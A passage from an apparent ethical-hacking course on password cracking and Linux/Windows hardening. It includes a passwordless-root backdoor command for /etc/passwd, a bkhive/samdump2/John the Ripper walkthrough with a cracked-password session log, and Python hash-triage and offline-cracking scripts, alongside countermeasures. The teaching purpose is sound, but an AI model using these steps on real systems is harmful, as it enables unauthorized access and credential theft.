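Mar  3 10:00:00 web1 sshd[4650]: Accepted password for alice from 192.0.2.5 port 3333 ssh2
Mar  3 10:00:05 web1 sshd[4651]: Failed password for alice from 192.0.2.5 port 3334 ssh2
Mar  3 13:30:19 web1 sshd[4890]: Failed password for invalid user test from 198.51.100.23 port 40590 ssh2
Mar  3 18:22:44 web1 sshd[5201]: Failed password for invalid user postgres from 198.51.100.23 port 40877 ssh2
"""

ASSUMED_YEAR = "2024"  # syslog timestamps have no year; assumed for the demo


def parse_failures(text):
    """Return {source_ip: [(timestamp, username), ...]} for failed logons only."""
    by_ip = defaultdict(list)
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(ASSUMED_YEAR + " " + m["ts"], "%Y %b %d %H:%M:%S")
            by_ip[m["ip"]].append((ts, m["user"]))
    return by_ip


def _has_burst(times, window_s, count):
    """True if any `count` consecutive failures fall inside `window_s` seconds."""
    for i in range(len(times) - count + 1):
        if (times[i + count - 1] - times[i]).total_seconds() <= window_s:
            return True
    return False


def classify(text, burst_window_s=60, burst_count=5, slow_min=4, slow_span_h=4):
    """Label each source as 'burst', 'low-and-slow', 'low-and-slow spray' or 'benign'."""
    verdicts = {}
    for ip, events in parse_failures(text).items():
        events.sort()
        times = [t for t, _ in events]
        users = {u for _, u in events}
        span_h = (times[-1] - times[0]).total_seconds() / 3600
        if _has_burst(times, burst_window_s, burst_count):
            verdicts[ip] = "burst"
        elif len(times) >= slow_min and span_h >= slow_span_h:
            # few failures per hour, but persistent; many names means a spray
            verdicts[ip] = "low-and-slow spray" if len(users) >= 3 else "low-and-slow"
        else:
            verdicts[ip] = "benign"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify(SAMPLE_LOG).items():
        print(ip, verdict)
```

The burst rule is what a lockout policy already enforces; the second rule is the one worth adding to log review, because five failures spread over sixteen hours never trip a per-minute counter and only stand out once failures are grouped by source over a long window.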
4.12 Cracking passwords with L0phtCrack__________
L0phtCrack is the utility that we will be using in this section to crack Windows NT
passwords. It is available at http://www.l0pht.com/10phtcrack
L0phtCrack is probably the easiest to use and the most effective utility available to
crack NT passwords. LC5 obtains password hashes from the operating system and
then begins hashing possible password values. The password is discovered when there
is a match between a target hash and a computed hash. LC5 must first obtain password
hashes from the target system, and then uses various cracking methods to recover the
passwords.
Figure 4.2
4.13 Obtaining the Password Hashes
Approaches to obtaining password hashes differ, depending on where the password
resides on the computer, and your ability to access them. LC5 can obtain password
hashes directly from remote machines, from the local file system, from backup tapes
and repair disks, from Active Directory, or by recovering them as they traverse the
network. Obtaining passwords over the network requires network and administrator
privileges. On systems that do not use Active Directory, or SYSKEY, you may obtain
password hashes directly from a password database file stored on the system, the SAM
file.
After obtaining the hashes LC5 will apply different cracks such as dictionary based,
hybrid crack, Pre-Computed Password Audits, brute force cracks on the hashes to get
the password.
LC5 can audit six different types of password hashes to recover a password:
1. The LM hash
2. The NTLM hash
3. The LM challenge response
4. The NTLM challenge response
5. Unix MD5-encoded password files
6. Unix DES-encoded password files
4.14 General password-hacking countermeasures____
A password for one system usually equals passwords for many other systems, because
many people use the same passwords on every system they use. For this reason,
instruct users to create different passwords for different systems especially on the
systems that protect more sensitive information.
Strong passwords are important, but balance security and convenience:
You can’t expect users to memorize passwords that are insanely complex and
changed every week.
You can’t afford weak passwords or no passwords at all.
4.14.1 Storing passwords
If you have to choose between weak passwords that your users can memorize and
strong passwords that your users must write down, I recommend having readers write
down passwords and store the information securely.
Train users to store their written passwords in a secure place — not on keyboards or in
easily cracked password-protected computer files (such as spreadsheets). Users should
store a written password in either of these locations:
A locked file cabinet or office safe
An encrypted file or database, using such tools as
" PGP (www.pgpi.org for the free open-source version or www.pgp.com
for the commercial version)
" Open-source Password Safe, originally developed by Counterpane
(passwordsafe.sourceforge.net)
4.14.2 Policy considerations
As an ethical hacker, you should show users the importance of securing their
passwords. Here are some tips on how to do that:
Demonstrate how to create secure passwords. You may want to refer to them as
pass codes or pass phrases, because people tend to take the word passwords
literally and use only words, which can be less secure.
Show what can happen when weak passwords are used or passwords are
shared.
Diligently build user awareness of social-engineering attacks.
Enforce (or encourage the use of) a strong password-creation policy that includes the
following criteria:
Use upper- and lowercase letters, special characters, and numbers.(Never use
only numbers. These passwords can be cracked quickly.)
Misspell words or create acronyms from a quote or a sentence. (An acronym is a
word created from the initials of a phrase. For example, ASCII is an acronym for
American Standard Code for Information Interchange.)
Use punctuation characters to separate words or acronyms.
Change passwords every 6 to 12 months.
Use different passwords for each system. This is especially important for
network-infrastructure hosts, such as servers, firewalls, and routers.
Use variable-length passwords. This can throw off the hackers, because they
won't know the required minimum or maximum length of passwords and must try
all password length combinations.
Don’t use common slang words or words that are in a dictionary.
Don’t use similar-looking characters, such as 3 instead of E, 5 instead of S, or !
instead of 1. Password-cracking programs can check for this.
Don’t reuse the same password within 12 months.
Use password-protected screen savers.
Don’t share passwords.
Avoid storing user passwords in a central place, such as an unsecured
spreadsheet on a hard drive. This is an invitation for disaster. Use PGP,
Password Safe, or a similar program to store user passwords.
Linux — the new darling competitor to Microsoft — is the latest flavor of UNIX that
has really taken off in corporate networks. A common misconception is that
Windows is the most insecure operating system (OS). However,
Linux — and most of its sister variants of UNIX — is prone to the same security
vulnerabilities as any other operating system.
Hackers are attacking Linux in droves because of its popularity and growing usage
in today’s network environment. Because some versions of Linux are
free — in the sense that you don’t have to pay for the base operating system —
many organizations are installing Linux for their Web servers and e-mail servers in
hopes of saving money. Linux has grown in popularity for other reasons, including
the following:
Abundant resources available, including books, Web sites, and
consultant expertise.
Perception that Linux is more secure than Windows.
Unlikeliness that Linux will get hit with as many viruses (not necessarily
worms) as Windows and its applications do. This is an area where Linux
excels when it comes to security, but it probably won’t stay that way.
Increased buy-in from other UNIX vendors, including IBM and Sun
Microsystems. Even Novell is rewriting NetWare to be based on the Linux
kernel.
Growing ease of use.
4.15 Linux Vulnerabilities_________________________
Vulnerabilities and hacker attacks against Linux are affecting a growing number of
organizations — especially e-commerce companies and ISPs that rely on Linux for
many of their systems. When Linux systems are hacked, the victim organizations
can experience the same side effects as if they were running
Windows, including:
Leakage of confidential intellectual property and customer information
Passwords being cracked
Systems taken completely offline by DoS attacks
Corrupted or deleted databases
4.15.1 Information Gathering
You can scan your Linux-based systems and gather information from both outside
(if the system is a publicly accessible host) and inside your network.
Scan from both directions so you see what the bad guys can see from both outside
and inside the network.
4.15.2 System scanning
Linux services — called daemons — are the programs that run on a system and
serve up various applications for users.
Internet services, such as the Apache Web server (httpd), telnet (telnetd),
and FTP (ftpd), often give away too much information about the system,
such as software versions, internal IP addresses, and usernames. This
information can allow a hacker to attack a known weakness in the system.
TCP and UDP small services such as echo, daytime, and chargen, are
often enabled by default and don’t need to be.
The vulnerabilities inherent in your Linux systems depend on what services are
running. You can perform basic port scans to glean information about what’s
running.
The SuperScan results in Figure 4.3 show many potentially vulnerable services
on this Linux system, including RPC, a Web server, telnet, and FTP.
Figure 4.3 Port scanning a Linux server with Super Scan.
4.15.3 Countermeasures
Although you can’t completely prevent system scanning, you can still implement the
following countermeasures to keep the bad guys from gleaning too
much information from your systems:
Protect the systems with either
o A firewall, such as netfilter/iptables (www.netfilter.org).
o A host-based intrusion-prevention application, such as PortSentry
(sourceforge.net/projects/sentrytools) now owned by Cisco Systems
(www.psionic.com) or SNARE
(www.intersectalliance.com/projects/Snare).
These security systems are the best way to prevent an attacker from gathering
information about your Linux systems.
Disable the services you don’t need, including RPC and such daemons as
HTTP, FTP, and telnet. You may very well need some of these daemons
and more — just make sure you have a business need for them. This keeps
the services from showing up in a port scan and, thus, gives an attacker
less incentive to break into your system.
Make sure the latest software and patches are loaded, so that even if a hacker
determines what you're running, the chances of exploitation are reduced.
4.15.4 Unneeded Services
When you know which applications are running — such as FTP, telnet, and a Web
server it’s nice to know exactly which versions are running so you can look up any of
their associated vulnerabilities and decide whether to just turn them off.
4.15.6 Searches
Several security tools can help determine vulnerabilities. These types of utilities may not
be able to identify all applications down to the exact version number, but they’re a very
powerful way of gleaning system information.
4.15.7 Vulnerabilities
Be especially mindful of these known security weaknesses in a system:
FTP — especially if it’s not properly configured — can provide a way for a
hacker to download and access files on your system.
Telnet is vulnerable to network-analyzer captures of the clear-text user
ID and password it uses.
Old versions of sendmail, the world's most popular e-mail server, have many
security issues. Make sure sendmail is patched and hardened.
R-services such as rlogin, rdist, rexecd, rsh, and rcp are especially
vulnerable to hacker attacks, because they trust the client's hostname or
address for authentication and carry credentials and sessions in clear text.
4.16 Tools______________________________________
The following tools can perform more in-depth information gathering beyond port
scanning to enumerate your Linux systems and see what the hackers see:
Nmap can check for specific versions of the services loaded, as shown in
Figure 4.4. Simply run Nmap with this command-line switch:
-sV
Figure 4.4
4.16.1 Countermeasures
You can and should disable the unneeded daemons on your Linux systems. This is one
of the best ways to keep your Linux system secure. It’s like locking the doors and
windows in your house — the more you lock the fewer places an intruder can enter.
4.17 Unix/ Linux_________________________________
Root is the superuser: the account with maximum privileges, which can do whatever it
wants on a system. Root is to *nix what Administrator is to Windows NT. If you get root
you can practically control each and every aspect of the system. You can, for example,
remove accounts, delete files, disable daemons and even format the entire system.
Thus, in order to get root on a Linux system with physical access using a very
basic loophole, simply follow these steps:
1. Boot the target system and wait for the Linux Loader (LILO) prompt to come up.
2. At the LILO prompt type linux single (or linux 1) to boot into single-user mode,
which drops you into a root shell where you can practically do anything.
3. Once single-user mode is running you have a root shell where you can type absolutely
any command that is accepted by the default shell on your system.
4. At this prompt, type linuxconf. This will bring up a blue screen, which is actually the
Linux Configuration Utility.
5. Click on Users > Root Password. This will give you access to the password settings or, in
other words, allow you to change the root password.
If you scroll down further, you will find that you can also add new accounts with root
privileges, using the linuxconf utility. Single-user mode and the linuxconf utility are
certainly not a hole in Linux; they were designed to help if the root password was
forgotten. The hole is unrestricted physical access to the boot loader, which is why LILO
(and later GRUB) supports a boot-loader password that must be entered before extra
kernel parameters such as single are accepted.
In the first method, we typed linuxconf at the bash shell prompt. However, we can instead
type the following, in order to create a new account with root privileges and without any
password:
echo "sedulity::0:0:::" >> /etc/passwd
/etc/passwd is the password file which stores the usernames (and, on older systems
without shadow passwords, the password hashes) of all accounts on the machine. One
thing to remember here is that you can edit the /etc/passwd file only if you are logged in
as root.
However, in this case we are not logged in as root, but still we are able to edit the
password file, as we have booted into single-user mode, which gives us the root shell.
To fully understand how the above command works, one needs to first know the
structure of the /etc/passwd file.
A typical line from the Unix password file is as follows:
sedulity:my_password_in_encrypted_form:2:3:sedulity knowledge:/home/sedulity:/bin/bash
The above extract from the Unix password file can, in turn, be broken up into seven
colon-separated fields:
Username: sedulity
Encrypted password: my_password_in_encrypted_form (an x here means the hash is kept in /etc/shadow)
User number (UID): 2
Group number (GID): 3
Actual name: sedulity knowledge (optional)
Home directory: /home/sedulity (optional)
Type of shell: /bin/bash (optional)
Coming back to our command, it is important to note that we have not included the
optional fields or the password field of a typical password-file line. Our command is as
follows:
echo "sedulity::0:0:::" >> /etc/passwd
This above command can also be rewritten as:
Username: sedulity
Encrypted password: (empty)
User number: 0
Group number: 0
Actual name: (empty)
Home directory: (empty)
Type of shell: (empty)
Thus, the command that we typed did nothing but create a new account with root
privileges (UID 0) and without any password. Such a technique can be used to create new
accounts with root privileges, which can then be used as backdoors into the system. Note
that on a shadow-password system it is the empty field in /etc/passwd, rather than an x
pointing at /etc/shadow, that makes the account passwordless, and whether a blank
password is accepted at login depends on the PAM configuration (the nullok option of
pam_unix). An auditor should treat any second UID 0 entry as a compromise indicator
regardless of whether it can log in.
4.17.1 Physical Security
Some Linux vulnerabilities involve the hacker’s actually being at the system console.
4.17.2 Hacks
When a hacker is at the system console, anything goes, including rebooting the system
(even if no one is logged in) simply by pressing Ctrl+Alt+Del. After the system is
rebooted, the hacker can start it up in single-user mode, which allows the hacker to zero
out the root password or possibly even read the entire /etc/passwd or /etc/shadow file.
4.17.3 Countermeasures
Edit your /etc/inittab file and remark out (place a # sign in front of) the line that reads
ca::ctrlaltdel:/sbin/shutdown -t3 -r now, as shown in the last line of Figure 4.5. On
distributions that boot with systemd rather than SysV init, the equivalent is
systemctl mask ctrl-alt-del.target. Neither stops an attacker who can pull the power
cord, so pair this with a BIOS and boot-loader password.
Figure 4.5
If you believe that a hacker has recently gained access to your system either physically
or by exploiting a vulnerability such as a weak password or buffer overflow, you can use
the last program to view the last few logins into the system to check for strange login IDs
or login times. This program peruses the /var/log/wtmp file and displays the users who
logged in last. You can enter last | head to view the first part of the file (the first ten lines)
if you want to see the most recent logins.
4.17.4 Patching Linux
Ongoing patching is perhaps the best thing you can do to enhance the security of your
Linux systems. Regardless of the Linux distribution you use, using a tool to assist in
your patching efforts makes your job a lot easier.
4.18.5 Distribution updates
The distribution process is different on every distribution of Linux. You can use the
following tools, based on your specific distribution.
4.18.5.1 Red Hat
You can use the following tools to update Red Hat Linux systems:
Red Hat Package Manager (RPM), the command-line tool (rpm) and package format
that Red Hat and other freeware and open-source developers use to package their
programs as .rpm files; graphical front ends for it run in the Red Hat desktop.
up2date, a command-line text-based tool that is included in Red Hat.
AutoRPM (www.autorpm.org).
The open-source NRH-up2date (www.nrh-up2date.org).
4.18.5.2 Debian
You can use the Debian Package System (dpkg) included with the operating system to
update Debian Linux systems.
4.18.5.3 Slackware
You can use the Slackware Package Tool (pkgtool) tool included with the operating
system to update Slackware Linux systems.
4.19 SuSE/Novell________________________________
SuSE (now owned by Novell) includes the YaST2 Package Manager.
Cracking SysKey and the SAM on Windows XP, 2000 and NT 4 using open-source tools is
a far simpler, faster and more concise way to crack hashes in the SAM file that are
protected by SysKey.
SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was
introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has
had SysKey enabled by default. The way most folks crack a SAM file on a system that
uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN
Manager) and NT hashes.
The problem is PWdump only works if you can run it from an administrator level
account, and if the reason an attacker is cracking the hashes in the first place is to get
an administrator level account then PWdump is of little use.
Some folks will ask why would you want to crack the passwords in the SAM at all since
it’s far easier to just change the Administrator password using a Linux boot disk or
Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the
local passwords instead of changing them is two fold:
1. An attacker doesn’t want to tip off the system administrators. If they notice that the
old local admin password no longer works they will get a little bit suspicious don’t you
think? This is somewhat solved by Sala’s Password Renew since it lets you add new
admin level accounts as well as change existing account’s passwords.
2. The same local account passwords may be used on other systems on the network
(and most likely are if they use imaging software like Ghost). If the attacker can crack
one machine’s admin password that same password may allow the attacker to gain
access to other boxes on that LAN that they only have remote access (across the
network) to.
This article assumes that the attacker has only physical access to the machine whose
SAM they want to crack and that they also have access to the Knoppix variant known as
the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial).
Here are the steps you will need to take in order to audit local passwords using the
Auditor CD:
Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will
be using in this tutorial come on the Auditor Boot CD.
Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM
as the first boot device in the BIOS. Some systems let you hold down a certain function
key at startup to choose what media to boot from (on recent Dells it's F12).
Step 3. Auditor will begin to boot and ask you what screen resolution you want to use.
Choose a resolution that your monitor and video card will support (I use 2 for 1024x768)
then hit enter.
Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new
terminal window (it looks like a little monitor). Below you will see the commands you will
have to use to get past SysKey, extract the hashes and attempt to crack the password
hashes.
Step 5. Mount the local hard disk, most likely hda1:
Linux Command:
mount /dev/hda1
Step 6. Change the present working directory to the ramdisk so we have space to work
with the files we will be creating:
Linux Command:
cd /ramdisk/
Step 7. Auditor comes with Ncuomo's Samdump2 and Bkhive [6]. We will be using
these tools to extract the system key from the SYSTEM hive and the password hashes
from the SAM file. To get the system key we need to use Bkhive on our SYSTEM file
(most likely in C:\WINDOWS\system32\config\SYSTEM, that's where it is on my XP Pro
test box; on some systems it will be in C:\WINNT\system32\config\SYSTEM or perhaps
on some other drive entirely). By the way, if for some reason you are running NT4 SP3 you
will need to use Bkreg instead; all later systems (NT4 SP4, 2000 and XP) use Bkhive. To
grab the system key and put it into a file we use the following command:
Linux Command:
bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Step 8. Now that we have the system key we can use it to undo SysKey on the SAM,
extract the hashes and place them into a PWDump format file:
Linux Command:
samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt > password-hashes.txt
Step 9. At this point we have a PWDump format file called password-hashes.txt that we
could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old
tutorial for details). As we were going to do it all with the Auditor CD and Open Source
tools we will use John the Ripper to crack the hashes, but before we can use John we
have to extract one of the many wordlists that comes with Auditor. Take a look on the
CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll
use english.txt for this tutorial. To extract english.txt to the ramdisk use the following
command:
Linux Command:
gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
Step 10. Now that everything is in place we can run John with a simple dictionary attack
to see if we can crack any of the hashes:
Linux Command:
john password-hashes.txt -w:eng.txt
John detects that the dump file has LM (LAN Manager) hashes in it and chooses the
format "NT LM DES [32/32 BS]" automatically. If I had disabled the storing of LM hashes
in the SAM I would want to use the -f option to specify the NT hash format and try to
crack the NT hashes instead. To do that I would use the following command:
Linux Command:
john password-hashes.txt -f:NT -w:eng.txt
If dictionary attacks aren’t working and you have a lot of time (as well as a fast
computer) you can try John’s incremental (brute force) mode and see if it gives you
better results:
Linux Command:
john password-hashes.txt -i:all
Incremental mode is limited to eight characters unless you change the source before
you compile it, but beyond eight characters you will likely be waiting a very long time
for John to finish. Going beyond eight characters is pointless anyway if you have the LM
hashes, since an LM hash is computed over the password uppercased and split into two
seven-character halves, each hashed independently (NT hashes are a different story and
can be harder to crack). In case you were wondering what all of these commands would
look like along with their output, here is a copy of my session log that may help you
understand how they all work together (notice that the password for the Administrator
account is "monkey"):
Session log saved from Auditor:
root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive [email protected]
Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt
Samdump2 [email protected]
This product includes cryptographic software written
by Eric Young ([email protected])
No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY           (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey           (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#
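As an added example (not part of the original article and not code from any of the tools it names), the following Python script parses pwdump-format lines like the password-hashes.txt produced in Step 8 and applies the LM facts described above: the well-known LM hash of an empty string (aad3b435b51404eeaad3b435b51404ee) marks an account with no LM hash to attack, its 16-hex-digit second half appearing on its own marks a password of seven characters or fewer, and the empty-string NT hash (31d6cfe0d16ae931b73c59d7e0c089c0) together with the empty LM hash marks a blank password. The sample lines are constructed; the non-empty hash values are made-up hex digits, not real hashes of any password.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (both halves empty)
EMPTY_LM_HALF = EMPTY_LM[:16]                    # LM hash of one empty 7-char half
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

# Constructed pwdump-format lines (user:RID:LM hash:NT hash:::). The non-empty
# hash values below are made-up hex, not real hashes of any password.
SAMPLE_DUMP = """\
Administrator:500:0a1b2c3d4e5f60718293a4b5c6d7e8f9:f9e8d7c6b5a49382716f5e4d3c2b1a00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
helpdesk:1002:1122334455667788aad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""


def parse_pwdump(text):
    """Parse user:RID:LM:NT::: lines into dicts; hashes are normalised to lowercase."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed hash line for {user}")
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def split_lm(lm):
    """An LM hash is two independent DES outputs over two 7-character halves."""
    return lm[:16], lm[16:]


def assess(account):
    """Return the weaknesses that are visible from the hash pair alone."""
    lm, nt = account["lm"], account["nt"]
    if nt == EMPTY_NT and lm == EMPTY_LM:
        return ["blank password"]
    if lm == EMPTY_LM:
        return ["no LM hash (LM storage disabled or password longer than 14 chars): "
                "crack the NT hash, e.g. john -f:NT"]
    findings = ["LM hash present: case-insensitive, each 7-char half cracks independently"]
    if split_lm(lm)[1] == EMPTY_LM_HALF:
        findings.append("second LM half is empty: password is 7 characters or fewer")
    return findings


def assess_dump(text):
    """Map each account in a pwdump file to its list of findings."""
    return {a["user"]: assess(a) for a in parse_pwdump(text)}


if __name__ == "__main__":
    for user, notes in assess_dump(SAMPLE_DUMP).items():
        print(f"{user}: " + "; ".join(notes))
```

Feeding the output of samdump2 through this before starting John tells you which accounts are worth the LM pass at all and which have to go straight to the slower NT format, and the second-half check singles out the short passwords that the eight-character incremental mode will finish first.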
4.19.1 Mitigating SAM and SysKey Cracking
There are a few more things that you can do to make it harder for attackers to crack
your local passwords. An attacker will most likely have to get into the BIOS to set it to
boot from the CD-ROM. Setting a BIOS password will help keep crackers from using
the Auditor CD (or any boot CD), but if they can get into the computer's case it's easy to
reset a BIOS password, so some sort of physical case lock should be used as well.
Strong passwords (non-dictionary words with more than just alphanumeric characters)
will also make it harder for attackers to crack passwords, since they will have to resort to
potentially slow brute-force methods. Disabling LM hash storage removes the weakest
hash from the SAM entirely, and whole-disk encryption keeps an offline boot from
reading the SAM and SYSTEM hives at all.
Chapter-5
Application Attacks
Session Objectives:
At the end of this Session, you will be able to understand –
Password
Password-Protected Files
Countermeasures
Other Ways to Crack Passwords
Keystroke Logging
Logging Tools
Countermeasures
Weak Password Storage
Countermeasures
5.1 Introduction – Password______________________
Passwords to access computer systems are usually stored, typically not in cleartext
form, in a database so the system can perform password verification when users
attempt to log in. To preserve confidentiality of system passwords, the password
verification data is typically generated by applying a one-way hash function (ideally with
a per-user salt) to the password. Even though functions that create hashed passwords
may be cryptographically secure, possession of a hashed password provides a quick way
to test guesses for the password by applying the function to each guess and comparing
the result to the verification data.
The term password cracking is typically limited to the recovery of one or more plaintext
passwords from hashed passwords, but there are many other ways of obtaining
passwords illicitly. Without the hashed version of a password, the attacker can still
attempt to access the computer system in question with guessed passwords. However,
well designed systems limit the number of failed access attempts and can alert
administrators, so that the source of the attack can be traced, if that quota is exceeded.
With the hashed password, the attacker can work offline and undetected, and if the
attacker has obtained several hashed passwords, the chance of cracking at least one is
quite high.
Otherwise it is possible to obtain passwords through other methods, such as social
engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing,
shoulder surfing, timing attacks, acoustic cryptanalysis, Trojan horses or viruses,
identity management system attacks (such as abuse of self-service password reset)
and compromising host security. However, cracking usually designates a guessing
attack.
5.2 Guessing___________________________________
Many passwords can be guessed either by humans or by sophisticated cracking
programs armed with dictionaries and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to
themselves in some way. Repeated research over some 40 years has demonstrated
that around 40% of user-chosen passwords are readily guessable by programs.
Common choices include:
Blank (none).
The words "password", "passcode", "admin" and their derivatives.
The user's name or login name.
The name of their significant other or another person.
Their birthplace or date of birth or a friend's, or a relative's.
A pet's name.
A dictionary word in any language.
A name of a celebrity they like.
Automobile license plate number.
A row of letters from a standard keyboard layout (e.g., the qwerty keyboard -qwerty itself, asdf, or qwertyuiop).
A simple modification of one of the preceding, such as suffixing a digit or
reversing the order of the letters, and so on.
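As an added example (not part of the original text or of any ElcomSoft product), the following Python script makes the offline/online distinction of section 5.1 concrete, using the "simple modifications" listed above as mutation rules. The password database, the salts, the wordlist and the lockout quota of five failures are all constructed for the example; SHA-256 stands in for whatever hash the target system actually uses.

```python
import hashlib

# Constructed sample "password database" for this example: username -> (salt, hash).
# The accounts and passwords are invented; the hash is SHA-256 over salt || password.
def _store(password, salt):
    return salt, hashlib.sha256((salt + password).encode()).hexdigest()

SAMPLE_DB = {
    "alice": _store("Password1", "s1"),    # dictionary word, capitalised, digit suffixed
    "bob":   _store("drowssap", "s2"),     # "password" reversed
    "carol": _store("qwerty", "s3"),       # keyboard row
    "dave":  _store("Tr0ub4dor&3", "s4"),  # not derivable from the wordlist; should survive
}

# A tiny constructed wordlist standing in for a dictionary file.
WORDLIST = ["password", "admin", "qwerty", "letmein", "alice"]

def mutations(word):
    """Yield the word plus the 'simple modifications' from the text: case variants,
    the reversed word, and each of those with a single digit suffixed."""
    seen = set()
    for base in (word, word.capitalize(), word.upper(), word[::-1]):
        for cand in (base, *(base + d for d in "0123456789")):
            if cand not in seen:
                seen.add(cand)
                yield cand

def crack_offline(db, wordlist):
    """Offline attack: the attacker holds the hashes, so every guess is a local hash
    computation; nothing is throttled or logged on the target system."""
    found = {}
    for user, (salt, digest) in db.items():
        for word in wordlist:
            hit = next((c for c in mutations(word)
                        if hashlib.sha256((salt + c).encode()).hexdigest() == digest), None)
            if hit is not None:
                found[user] = hit
                break
    return found

class OnlineLogin:
    """A login endpoint with a failed-attempt quota, the 'well designed system' of the
    text: it answers only ok/fail per attempt and locks the account at max_failures."""
    def __init__(self, db, max_failures=5):
        self.db = db
        self.max_failures = max_failures
        self.failures = {}
        self.locked = set()

    def attempt(self, user, password):
        if user in self.locked:
            return "locked"
        salt, digest = self.db[user]
        if hashlib.sha256((salt + password).encode()).hexdigest() == digest:
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked.add(user)   # this is where an administrator would be alerted
            return "locked"
        return "fail"

def crack_online(login, user, wordlist):
    """The same guesses against the live endpoint; returns (password or None, attempts).
    The lockout stops the attack long before the candidate list is exhausted."""
    tried = 0
    for word in wordlist:
        for cand in mutations(word):
            tried += 1
            result = login.attempt(user, cand)
            if result == "ok":
                return cand, tried
            if result == "locked":
                return None, tried
    return None, tried
```

Run offline, three of the four sample accounts fall to the first wordlist entries; run online against the lockout endpoint, the same guesses for "alice" are stopped at the fifth attempt, which is exactly why an attacker wants the hashes rather than the login prompt.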
5.3 Password-protected files______________________
Do you wonder how vulnerable word-processing, spreadsheet, and zip files are as users
send them into the wild blue yonder? Wonder no more. Some great utilities can show
how easily passwords are cracked.
Cracking files
Most password-protected files can be cracked in seconds or minutes. You can
demonstrate this "wow-factor" security vulnerability to users and management. Here's a
real-world scenario:
Your CFO wants to send some confidential financial information in an Excel
spreadsheet to the company’s outside financial advisor.
She protects the spreadsheet by assigning a password to it during the file-save
process in Excel 2002.
For good measure, she uses WinZip to compress the file, and adds another
password to make it really secure.
The CFO sends the spreadsheet as an e-mail attachment, assuming that it will
reach its destination securely.
The financial advisor's network has content filtering, which monitors incoming e-mails
for keywords and file attachments. Unfortunately, the financial advisory firm's network
administrator is looking in the content filtering system to see what's coming in.
This rogue network administrator finds the e-mail with the confidential
attachment, saves the attachment, and realizes that it's password-protected.
The network administrator remembers some great password-cracking utilities
from ElcomSoft (www.elcomsoft.com) that can help him out. He may see
something like the figures that follow.
Cracking password-protected files is as simple as that! Now all that the rogue network
administrator must do is forward the confidential spreadsheet to his buddies or the
company's competitors.
If you carefully select the right options in Advanced ZIP Password Recovery and Office
XP Password Recovery, you can drastically shorten your testing time. For example, if
you know that a password is no longer than 5 characters and uses lowercase letters
only, the search space shrinks from 94^5 (over 7 billion candidates for all printable
ASCII characters) to 26^5 (about 12 million), so the cracking time drops by orders of
magnitude rather than merely in half.
5.4 Brute force attack____________________________
A brute force attack is a method of defeating a cryptographic scheme by trying a large
number of possibilities; for example, exhaustively working through all possible keys in
order to decrypt a message. In most schemes, the theoretical possibility of a brute force
attack is recognized, but it is set up in such a way that it would be computationally
infeasible to carry out. Accordingly, one definition of "breaking" a cryptographic scheme
is to find a method faster than a brute force attack.
5.5 ElcomSoft's Advanced Office XP Password Recovery (AOPR)________
5.5.1 Selecting a File:
To select the file you want to recover the password(s) for, simply press the "Open File"
button (or select the "File | Open File" menu item) and browse for the appropriate file (or
click the small arrow at the right to load a file you have worked with recently).
The file format will be recognized automatically, with a corresponding message in the
Log Window. If the specified file format is not supported by AOPR, or the file is
corrupted or in use by another application, an appropriate error message will be displayed.
You can clear the Recent Files list by selecting the "File | Clear Files History" menu item.
Figure: 5.1
5.5.2 Result:
After the file selection, the dialog box with results will be displayed automatically. The
following situations may occur as the result of file processing:
All or some passwords were recovered. The dialog box with passwords is displayed.
Password fields may contain these auxiliary messages:
None - the password is not set;
Cannot be found instantly - the password cannot be recovered instantly; you
must select the Attack Options and start the attack to recover this password. You
can create a Project to save the attack parameters to a file.
Can be changed - the password cannot be recovered, but can be changed or
deleted. In this case the results dialog contains two additional buttons:
"Change Password" and "Delete Password". You can change or delete the
password simply by clicking those buttons. The selected file must not be write-protected
for this operation to succeed.
Not available - the password cannot be recovered for some reason. The
possible reasons are:
The selected file format does not have such a password
